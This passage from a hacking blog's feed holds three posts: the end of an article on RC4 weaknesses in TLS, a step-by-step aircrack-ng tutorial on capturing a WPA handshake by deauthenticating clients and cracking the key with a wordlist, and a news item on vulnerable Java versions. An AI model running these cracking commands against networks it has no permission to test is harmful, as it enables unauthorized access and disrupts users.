&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;AlFBPPS measured how accurate their plaintext guesses were for varying numbers of TLS sessions, and the results were worrying, if not actually scary:&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-6DhbX4cboUs/UVcc2jJrDYI/AAAAAAAABDs/AOPlfgYjGxQ/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="212" src="http://2.bp.blogspot.com/-6DhbX4cboUs/UVcc2jJrDYI/AAAAAAAABDs/AOPlfgYjGxQ/s640/5.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;"However, given the huge number of TLS sessions required, The Register's provocative URL&amp;nbsp;&lt;a href="http://www.theregister.co.uk/2013/03/15/tls_broken/" rel="nofollow" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: #2571c2; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"&gt;&lt;tt style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;theregister.co.uk/tls_broken&lt;/tt&gt;&lt;/a&gt;&amp;nbsp;might be going a bit far.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;Initiating 2&lt;sup style="background-color: transparent; border: 0px; bottom: 1ex; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; vertical-align: baseline;"&gt;32&lt;/sup&gt;&amp;nbsp;(4 billion), or even 2&lt;sup style="background-color: transparent; border: 0px; bottom: 1ex; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; vertical-align: baseline;"&gt;28&lt;/sup&gt;&amp;nbsp;(260 million), TLS sessions, and then sniffing and post-processing the results to extract a session cookie is unlikely to be a practicable attack any time soon.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;If nothing else, the validity of the session cookie might reasonably be expected to be shorter than the time taken to provoke hundreds of millions of redundant TLS connections.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;On the other hand, the advice to avoid RC4 altogether because of its not-so-random PRNG can't be written off as needlessly conservative.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;strong style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;span style="font-family: inherit;"&gt;If you can, ditch RC4 from the set of symmetric ciphers your web browser is willing to use, and your web servers to accept.&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;Go for AES-GCM instead.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;GCM, or&amp;nbsp;Galois/Counter Mode, is a comparatively new way of using block ciphers that gives you encryption and authentication all in one, which not only avoids the risky RC4 cipher, but neatly bypasses the problems exposed in the Lucky 13 attack, too."&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;Cheers!&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;b&gt;&lt;span style="font-family: inherit;"&gt;About the Author:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;This Article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=kkPYMwf-eZ8:zskp8EVXvFk:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=kkPYMwf-eZ8:zskp8EVXvFk:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=kkPYMwf-eZ8:zskp8EVXvFk:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=kkPYMwf-eZ8:zskp8EVXvFk:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/kkPYMwf-eZ8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/7623453640963117943/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/https-cracked-ssltls-attacked-and.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7623453640963117943?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7623453640963117943?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/kkPYMwf-eZ8/https-cracked-ssltls-attacked-and.html" title="HTTPS Cracked! SSL/TLS Attacked And Exploited" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-pLDugjvPA60/UVcg6Ff2pcI/AAAAAAAABD0/dxhMOdUC3a8/s72-c/https.png" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/https-cracked-ssltls-attacked-and.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQCRH8_eip7ImA9WhBXFUU.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-1931442873947177752</id><published>2013-03-29T12:45:00.000-07:00</published><updated>2013-03-29T12:46:05.142-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-29T12:46:05.142-07:00</app:edited><title>How To Crack A WPA Key With Aircrack-ng</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-6neXo2ztHSs/UVXcpch_yRI/AAAAAAAAAGA/jRiTyQo5Ofs/s1600/How-to-Hack-Wifi-and-how-to-avoid-being-hacked-.jpg.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="276" src="http://1.bp.blogspot.com/-6neXo2ztHSs/UVXcpch_yRI/AAAAAAAAAGA/jRiTyQo5Ofs/s400/How-to-Hack-Wifi-and-how-to-avoid-being-hacked-.jpg.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2.

Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. 

One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Network Adapter I am going to use for WPA/WPA2 cracking is &lt;b&gt;Alfa AWUS036H&lt;/b&gt; , &lt;b&gt;OS#  Backtrack 5R2&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 : Setting up your network device&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:&lt;br /&gt;
&lt;b&gt;Command # iwconfig&lt;/b&gt; (to find all wireless network interfaces and their status)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-bSVJMEFBm-U/UVXSl3D0fsI/AAAAAAAAAFE/BzBYXyAzKSs/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="275" src="http://3.bp.blogspot.com/-bSVJMEFBm-U/UVXSl3D0fsI/AAAAAAAAAFE/BzBYXyAzKSs/s400/1.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Command # airmon-ng start wlan0&lt;/b&gt;   (to set in monitor mode, you may have to substitute wlan0 for your own interface name)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/--B6cDj51bL8/UVXSmKDBFYI/AAAAAAAAAFM/zBdL1biAzhU/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="231" src="http://1.bp.blogspot.com/--B6cDj51bL8/UVXSmKDBFYI/AAAAAAAAAFM/zBdL1biAzhU/s400/2.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;Step 2 : Reconnaissance&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Command # airodump-ng mon0&lt;/b&gt;  (Monitors all channels, listing available access points and associated clients within range.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-JeDgkWXIhMg/UVXSpQEI4_I/AAAAAAAAAFU/ADuDE4BDpPg/s1600/3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="236" src="http://4.bp.blogspot.com/-JeDgkWXIhMg/UVXSpQEI4_I/AAAAAAAAAFU/ADuDE4BDpPg/s400/3.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;Step 3 : Capturing Packets&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Command # airodump-ng -c 1 bssid AP_MAC -w data mon0&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-qXK2BBofSK4/UVXSpyiKl-I/AAAAAAAAAFc/Z8qscBPTstU/s1600/4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" src="http://4.bp.blogspot.com/-qXK2BBofSK4/UVXSpyiKl-I/AAAAAAAAAFc/Z8qscBPTstU/s400/4.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 : De-Authentication Technique&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0&lt;/b&gt;  (where MAC_AP is the MAC address of the access point,  MAC_Client is the MAC address of an associated client.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-0X-bZw62rhs/UVXSqa8_OGI/AAAAAAAAAFo/K7eFOjJZyQ4/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="236" src="http://2.bp.blogspot.com/-0X-bZw62rhs/UVXSqa8_OGI/AAAAAAAAAFo/K7eFOjJZyQ4/s400/5.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;So, now we have successfully acquired a WPA Handshake.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-OeQDu1b7JjY/UVXSrK6AYuI/AAAAAAAAAF4/vvHQjuYTyBk/s1600/6-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="123" src="http://2.bp.blogspot.com/-OeQDu1b7JjY/UVXSrK6AYuI/AAAAAAAAAF4/vvHQjuYTyBk/s400/6-1.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;Step 5 : Cracking WPA/WAP2&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Command # aircrack-ng -w wordlist ‘capture_file’.cap&lt;/b&gt; (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake) &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-Rs7s_o58WSU/UVXSrm3XUgI/AAAAAAAAAF8/jfON9gUZOfE/s1600/7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="220" src="http://3.bp.blogspot.com/-Rs7s_o58WSU/UVXSrm3XUgI/AAAAAAAAAF8/jfON9gUZOfE/s400/7.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.&lt;br /&gt;
Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #666666;"&gt;&lt;b&gt;About The Author&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;b&gt;Shaharyar Shafiq&lt;/b&gt; is doing Bachelors in Computer Engineering from Hamdard University. He has done &lt;b&gt;C|PTE&lt;/b&gt; (Certified Penetration Testing Engineering) and he is interested in network Penetration Testing and Forensics.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Sqfv973NC8g:YVlGYxt629o:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Sqfv973NC8g:YVlGYxt629o:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Sqfv973NC8g:YVlGYxt629o:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Sqfv973NC8g:YVlGYxt629o:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/Sqfv973NC8g" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/1931442873947177752/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/how-to-crack-wpa-key-with-aircrack-ng.html#comment-form" title="8 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1931442873947177752?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1931442873947177752?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/Sqfv973NC8g/how-to-crack-wpa-key-with-aircrack-ng.html" title="How To Crack A WPA Key With Aircrack-ng" /><author><name>Shaharyar Shafiq</name><uri>https://plus.google.com/113862218722503273440</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/--k2pi9XiHU0/AAAAAAAAAAI/AAAAAAAAAHI/Kl1wAcIBxS4/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-6neXo2ztHSs/UVXcpch_yRI/AAAAAAAAAGA/jRiTyQo5Ofs/s72-c/How-to-Hack-Wifi-and-how-to-avoid-being-hacked-.jpg.gif" height="72" width="72" /><thr:total>8</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/how-to-crack-wpa-key-with-aircrack-ng.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkUMRnYzeyp7ImA9WhBXFEo.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4938459677342403362</id><published>2013-03-28T04:12:00.000-07:00</published><updated>2013-03-28T04:31:27.883-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-28T04:31:27.883-07:00</app:edited><title>Java Hits Another Roadblock - Found To Be A Threat For Browsers</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-CGmzA4cTOJw/UVMC3rAz7tI/AAAAAAAABC8/fZOdgi3JSMg/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="444" src="http://4.bp.blogspot.com/-CGmzA4cTOJw/UVMC3rAz7tI/AAAAAAAABC8/fZOdgi3JSMg/s640/3.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Java has been the most talked about application in the past couple of months. Not because of its functionality but due to its &lt;a href="http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerability-spotted-in.html" target="_blank"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;inability to refrain from being attacked and exploited&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;. Oracle has released emergency security patches to deal with the vulnerabilities in Java but to no avail. Java has been attacked over and over again by free-rollers and experts alike using &lt;a href="http://www.rafayhackingarticles.net/2013/03/how-attackers-spread-malware-with-java.html" target="_blank"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;various tactics&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
According to a report about a 100 million PCs are vulnerable to various attacks leading to&amp;nbsp;unauthorized&amp;nbsp;access through Java's unstable software. If things weren't bad enough for the software already, Department of Homeland Security issued a warning to all PC users to disable Java on their systems.&lt;br /&gt;
&lt;br /&gt;
Experts at Websense decided to do a little bit of research on the topic. Therefore, coming up with a list of Java vulnerabilities, versions affected etc.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-kjM_eoS76e8/UVMCYyE5dgI/AAAAAAAABCs/DxbRD5YF84s/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="155" src="http://2.bp.blogspot.com/-kjM_eoS76e8/UVMCYyE5dgI/AAAAAAAABCs/DxbRD5YF84s/s640/2.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;
&lt;b&gt;&lt;u&gt;According to &lt;a href="http://community.websense.com/blogs/securitylabs/archive/2013/03/25/how-are-java-attacks-getting-through.aspx" rel="nofollow" target="_blank"&gt;&lt;span style="color: blue;"&gt;Websense&lt;/span&gt;&lt;/a&gt;;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;It is probably no surprise that the largest single exploited vulnerability is the most recent one,&amp;nbsp;with a vulnerable population of browsers at 93.77%.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"&gt;That's what the bad guys do&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; font-family: inherit; line-height: 17px; margin: 0px; padding: 0px; text-align: -webkit-auto;"&gt;—&lt;/span&gt;&lt;span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"&gt;&amp;nbsp;examine your security controls and find the easiest way to bypass them. Grabbing a copy of the latest version of Cool and using a pre-packaged exploit is a pretty low bar to go after such a large population of vulnerable browsers.&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"&gt;Most browsers are vulnerable to a much broader array of well-known Java holes, with over 75% using versions that are at least six months old, nearly two-thirds being more than a year out of date, and&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: white; font-family: inherit; line-height: 17px; margin: 0px; padding: 0px; text-align: -webkit-auto;"&gt;more than 50% of browsers are greater than two years behind the times with respect to Java vulnerabilities&lt;/i&gt;&lt;span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"&gt;. And don't forget that if you're not on version 7 (which is 78.86% of you),&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;Oracle won't be sending you any more updates even if new vulnerabilities are uncovered.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;Cheers!&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: -webkit-auto;"&gt;
&lt;span style="line-height: 17px;"&gt;&lt;b&gt;About the Author:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: -webkit-auto;"&gt;
&lt;span style="line-height: 17px;"&gt;This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=E1Da2IYn86s:TSHwsY_IhRQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:V_sGLiPBpWU"&gt;&lt;img 